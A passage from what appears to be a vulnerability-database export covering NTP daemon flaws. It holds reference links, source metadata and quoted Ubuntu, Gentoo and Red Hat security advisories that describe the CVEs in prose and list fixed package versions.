"http://www.mandriva.com/security/advisories?name=mdvsa-2015:003" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144182594518755\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142853370924302\u0026w=2" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/71761" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04916783" }, { "trust": 1.1, "url": "http://www1.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-417665.htm" }, { "trust": 1.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04790232" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10103" }, { "trust": 1.1, "url": "http://secunia.com/advisories/62209" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00020.html" }, { "trust": 1.1, "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes" }, { "trust": 1.1, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1047-security-advisory-8" }, { "trust": 1.0, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9295" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9294" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9295" }, { "trust": 0.9, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9293" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/support/accessrestrictions#section_6.5.2" }, { "trust": 0.8, "url": "http://www.ntp.org/downloads.html" }, { "trust": 0.8, "url": "http://www.ntp.org/ntpfaq/ntp-s-algo-crypt.htm" }, { "trust": 0.8, "url": "http://googleprojectzero.blogspot.com/2015/01/finding-and-exploiting-ntpd.html" }, { "trust": 0.8, "url": "https://support.f5.com/kb/en-us/solutions/public/15000/900/sol15936.html" }, { "trust": 0.8, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-15:07.ntp.asc" }, { "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-2024.html" }, { "trust": 0.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01c" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu96605606/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-9295" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9296" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2014-9295" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_ntp" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10663\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-408044.htm" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04574882" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101006439" }, { "trust": 0.3, "url": "http://support.citrix.com/article/ctx200355" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/jan/att-97/esa-2015-004.txt" }, { "trust": 0.3, "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:31.ntp.asc" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04582466" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04916783" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/sep/41" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04554677" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966675" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967791" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21696755" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01a" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory2.asc" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101006440" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022036" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg1ssrvpoaix71security150210-1549" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097113" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022073" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698473" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21696812" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020645" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097490" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005067" }, { "trust": 0.3, "url": "http://www.hitachi.co.jp/products/it/server/security/global/info/vulnerable/ntpd_cve-2014-9293.html" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9294" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9296" }, { "trust": 0.2, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9293" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-9294" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-9293" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2014:2025" }, { "trust": 0.1, "url": "https://github.com/opragel/osx-10.7-ntp" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01-supplementa" }, { "trust": 0.1, "url": "https://www.freebsd.org/handbook/makeworld.html\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/\u003e." }, { "trust": 0.1, "url": "https://security.freebsd.org/advisories/freebsd-sa-14:31.ntp.asc\u003e" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-14:31/ntp.patch.asc" }, { "trust": 0.1, "url": "https://security.freebsd.org/patches/sa-14:31/ntp.patch" }, { "trust": 0.1, "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9294\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9296\u003e" }, { "trust": 0.1, "url": "https://www.kb.cert.org/vuls/id/852879\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9293\u003e" }, { "trust": 0.1, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-9295\u003e" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n" }, { "trust": 0.1, "url": "http://www.hpe.com/support/security_bulletin_archive" }, { "trust": 0.1, "url": "http://www.hpe.com/support/subscriber_choice" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9296" }, { "trust": 0.1, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/sw" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9297" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5211" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9294" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9296" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9295" }, { "trust": 0.1, "url": "http://security.gentoo.org/glsa/glsa-201412-34.xml" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-9293" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "VULMON", "id": "CVE-2014-9295" }, { "db": "BID", "id": "71761" }, { "db": "JVNDB", "id": "JVNDB-2014-007352" }, { "db": "PACKETSTORM", "id": "129716" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "134756" }, { "db": "PACKETSTORM", "id": "130140" }, { "db": "PACKETSTORM", "id": "130481" }, { "db": "PACKETSTORM", "id": "129693" }, { "db": "PACKETSTORM", "id": "133517" }, { "db": "PACKETSTORM", "id": "129683" }, { "db": "PACKETSTORM", "id": "129723" }, { "db": "NVD", "id": "CVE-2014-9295" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "VULMON", "id": "CVE-2014-9295" }, { "db": "BID", "id": "71761" }, { "db": "JVNDB", "id": "JVNDB-2014-007352" }, { "db": "PACKETSTORM", "id": "129716" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "134756" }, { "db": "PACKETSTORM", "id": "130140" }, { "db": "PACKETSTORM", "id": "130481" }, { "db": "PACKETSTORM", "id": "129693" }, { "db": "PACKETSTORM", "id": "133517" }, { "db": "PACKETSTORM", "id": "129683" }, { "db": "PACKETSTORM", "id": "129723" }, { "db": "NVD", "id": "CVE-2014-9295" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-12-19T00:00:00", "db": "CERT/CC", "id": "VU#852879" }, { "date": "2014-12-20T00:00:00", "db": "VULMON", "id": "CVE-2014-9295" }, { "date": "2014-12-19T00:00:00", "db": "BID", "id": "71761" }, { "date": "2014-12-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007352" }, { "date": "2014-12-24T16:34:30", "db": "PACKETSTORM", "id": "129716" }, { "date": "2015-01-05T16:17:48", "db": "PACKETSTORM", "id": "129793" }, { "date": "2015-12-10T17:24:17", "db": "PACKETSTORM", "id": "134756" }, { "date": "2015-01-29T06:07:22", "db": "PACKETSTORM", "id": "130140" }, { "date": "2015-02-19T19:22:00", "db": "PACKETSTORM", "id": "130481" }, { "date": "2014-12-23T15:41:03", "db": "PACKETSTORM", "id": "129693" }, { "date": "2015-09-10T00:10:00", "db": "PACKETSTORM", "id": "133517" }, { "date": "2014-12-22T17:15:48", "db": "PACKETSTORM", "id": "129683" }, { "date": "2014-12-26T15:46:55", "db": "PACKETSTORM", "id": "129723" }, { "date": "2014-12-20T02:59:02.693000", "db": "NVD", "id": "CVE-2014-9295" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-10-27T00:00:00", "db": "CERT/CC", "id": "VU#852879" }, { "date": "2021-11-17T00:00:00", "db": "VULMON", "id": "CVE-2014-9295" }, { "date": "2016-10-26T04:13:00", "db": "BID", "id": "71761" }, { "date": "2017-03-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-007352" }, { "date": "2021-11-17T22:15:38.877000", "db": "NVD", "id": "CVE-2014-9295" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "129716" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "134756" }, { "db": "PACKETSTORM", "id": "129723" } ], "trust": 0.4 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP Project Network Time Protocol daemon (ntpd) contains multiple vulnerabilities (Updated)", "sources": [ { "db": "CERT/CC", "id": "VU#852879" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Input Validation Error", "sources": [ { "db": "BID", "id": "71761" } ], "trust": 0.3 } }
var-201701-0399
Vulnerability from variot
The MATCH_ASSOC function in NTP before version 4.2.8p9 and 4.3.x before 4.3.92 allows remote attackers to cause an out-of-bounds reference via an addpeer request with a large hmode value. The NTP.org reference implementation of ntpd contains multiple vulnerabilities. NTP is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Versions prior to NTP 4.2.8p7 and 4.3.x versions prior to 4.3.92 are vulnerable. ========================================================================== Ubuntu Security Notice USN-3096-1 October 05, 2016
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in NTP. A remote attacker could use this issue to perform a replay attack. (CVE-2015-7973)
Matt Street discovered that NTP incorrectly verified peer associations of symmetric keys. A remote attacker could use this issue to perform an impersonation attack. (CVE-2015-7974)
Jonathan Gardner discovered that the NTP ntpq utility incorrectly handled memory. This issue only affected Ubuntu 16.04 LTS. (CVE-2015-7975)
Jonathan Gardner discovered that the NTP ntpq utility incorrectly handled dangerous characters in filenames. An attacker could possibly use this issue to overwrite arbitrary files. (CVE-2015-7976)
Stephen Gray discovered that NTP incorrectly handled large restrict lists. (CVE-2015-7977, CVE-2015-7978)
Aanchal Malhotra discovered that NTP incorrectly handled authenticated broadcast mode. (CVE-2015-7979)
Jonathan Gardner discovered that NTP incorrectly handled origin timestamp checks. A remote attacker could use this issue to spoof peer servers. (CVE-2015-8138)
Jonathan Gardner discovered that the NTP ntpq utility did not properly handle certain incorrect values. (CVE-2015-8158)
It was discovered that the NTP cronjob incorrectly cleaned up the statistics directory. A local attacker could possibly use this to escalate privileges. (CVE-2016-0727)
Stephen Gray and Matthew Van Gundy discovered that NTP incorrectly validated crypto-NAKs. A remote attacker could possibly use this issue to prevent clients from synchronizing. A remote attacker could possibly use this issue to prevent clients from synchronizing. (CVE-2016-1548)
Matthew Van Gundy, Stephen Gray and Loganaden Velvindron discovered that NTP incorrectly handled message authentication. (CVE-2016-1550)
Yihan Lian discovered that NTP incorrectly handled duplicate IPs on unconfig directives. (CVE-2016-4956)
In the default installation, attackers would be isolated by the NTP AppArmor profile.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: ntp 1:4.2.8p4+dfsg-3ubuntu5.3
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.10
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.11
In general, a standard system update will make all the necessary changes. 6.7) - i386, noarch, ppc64, s390x, x86_64
Gentoo Linux Security Advisory GLSA 201607-15
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: July 20, 2016 Bugs: #563774, #572452, #581528, #584954 ID: 201607-15
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to Denial of Service.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p8 >= 4.2.8_p8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p8"
References
[ 1 ] CVE-2015-7691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691 [ 2 ] CVE-2015-7692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692 [ 3 ] CVE-2015-7701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701 [ 4 ] CVE-2015-7702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702 [ 5 ] CVE-2015-7703 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703 [ 6 ] CVE-2015-7704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704 [ 7 ] CVE-2015-7705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705 [ 8 ] CVE-2015-7848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848 [ 9 ] CVE-2015-7849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849 [ 10 ] CVE-2015-7850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850 [ 11 ] CVE-2015-7851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851 [ 12 ] CVE-2015-7852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852 [ 13 ] CVE-2015-7853 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853 [ 14 ] CVE-2015-7854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854 [ 15 ] CVE-2015-7855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855 [ 16 ] CVE-2015-7871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871 [ 17 ] CVE-2015-7973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973 [ 18 ] CVE-2015-7974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974 [ 19 ] CVE-2015-7975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975 [ 20 ] CVE-2015-7976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976 [ 21 ] CVE-2015-7977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977 [ 22 ] CVE-2015-7978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978 [ 23 ] CVE-2015-7979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979 [ 24 ] CVE-2015-8138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138 [ 25 ] CVE-2015-8139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139 [ 26 ] CVE-2015-8140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140 [ 27 ] CVE-2015-8158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158 [ 28 ] CVE-2016-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547 [ 29 ] CVE-2016-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548 [ 30 ] CVE-2016-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549 [ 31 ] CVE-2016-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550 [ 32 ] CVE-2016-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551 [ 33 ] CVE-2016-2516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516 [ 34 ] CVE-2016-2517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517 [ 35 ] CVE-2016-2518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518 [ 36 ] CVE-2016-2519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519 [ 37 ] CVE-2016-4953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953 [ 38 ] CVE-2016-4954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954 [ 39 ] CVE-2016-4955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955 [ 40 ] CVE-2016-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956 [ 41 ] CVE-2016-4957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-15
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: ntp security update Advisory ID: RHSA-2016:1141-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2016:1141 Issue date: 2016-05-31 CVE Names: CVE-2015-7979 CVE-2016-1547 CVE-2016-1548 CVE-2016-1550 CVE-2016-2518 =====================================================================
- Summary:
An update for ntp is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.
Security Fix(es):
-
It was found that when NTP was configured in broadcast mode, a remote attacker could broadcast packets with bad authentication to all clients. The clients, upon receiving the malformed packets, would break the association with the broadcast server, causing them to become out of sync over a longer period of time. (CVE-2015-7979)
-
A denial of service flaw was found in the way NTP handled preemptable client associations. A remote attacker could send several crypto NAK packets to a victim client, each with a spoofed source address of an existing associated peer, preventing that client from synchronizing its time. (CVE-2016-1547)
-
It was found that an ntpd client could be forced to change from basic client/server mode to the interleaved symmetric mode. A remote attacker could use a spoofed packet that, when processed by an ntpd client, would cause that client to reject all future legitimate server responses, effectively disabling time synchronization on that client. (CVE-2016-1548)
-
A flaw was found in the way NTP's libntp performed message authentication. An attacker able to observe the timing of the comparison function used in packet authentication could potentially use this flaw to recover the message digest. (CVE-2016-1550)
-
An out-of-bounds access flaw was found in the way ntpd processed certain packets. An authenticated attacker could use a crafted packet to create a peer association with hmode of 7 and larger, which could potentially (although highly unlikely) cause ntpd to crash. (CVE-2016-2518)
The CVE-2016-1548 issue was discovered by Miroslav Lichvar (Red Hat).
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1300271 - CVE-2015-7979 ntp: off-path denial of service on authenticated broadcast mode 1331461 - CVE-2016-1547 ntp: crypto-NAK preemptable association denial of service 1331462 - CVE-2016-1548 ntp: ntpd switching to interleaved mode with spoofed packets 1331464 - CVE-2016-1550 ntp: libntp message digest disclosure 1331468 - CVE-2016-2518 ntp: out-of-bounds references on crafted packet
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
i386: ntp-4.2.6p5-10.el6.1.i686.rpm ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntpdate-4.2.6p5-10.el6.1.i686.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntp-perl-4.2.6p5-10.el6.1.i686.rpm
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
i386: ntp-4.2.6p5-10.el6.1.i686.rpm ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntpdate-4.2.6p5-10.el6.1.i686.rpm
ppc64: ntp-4.2.6p5-10.el6.1.ppc64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm ntpdate-4.2.6p5-10.el6.1.ppc64.rpm
s390x: ntp-4.2.6p5-10.el6.1.s390x.rpm ntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm ntpdate-4.2.6p5-10.el6.1.s390x.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntp-perl-4.2.6p5-10.el6.1.i686.rpm
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-10.el6.1.ppc64.rpm ntp-perl-4.2.6p5-10.el6.1.ppc64.rpm
s390x: ntp-debuginfo-4.2.6p5-10.el6.1.s390x.rpm ntp-perl-4.2.6p5-10.el6.1.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ntp-4.2.6p5-10.el6.1.src.rpm
i386: ntp-4.2.6p5-10.el6.1.i686.rpm ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntpdate-4.2.6p5-10.el6.1.i686.rpm
x86_64: ntp-4.2.6p5-10.el6.1.x86_64.rpm ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntpdate-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-10.el6.1.i686.rpm ntp-perl-4.2.6p5-10.el6.1.i686.rpm
noarch: ntp-doc-4.2.6p5-10.el6.1.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-10.el6.1.x86_64.rpm ntp-perl-4.2.6p5-10.el6.1.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: ntp-4.2.6p5-22.el7_2.2.src.rpm
x86_64: ntp-4.2.6p5-22.el7_2.2.x86_64.rpm ntp-debuginfo-4.2.6p5-22.el7_2.2.x86_64.rpm ntpdate-4.2.6p5-22.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
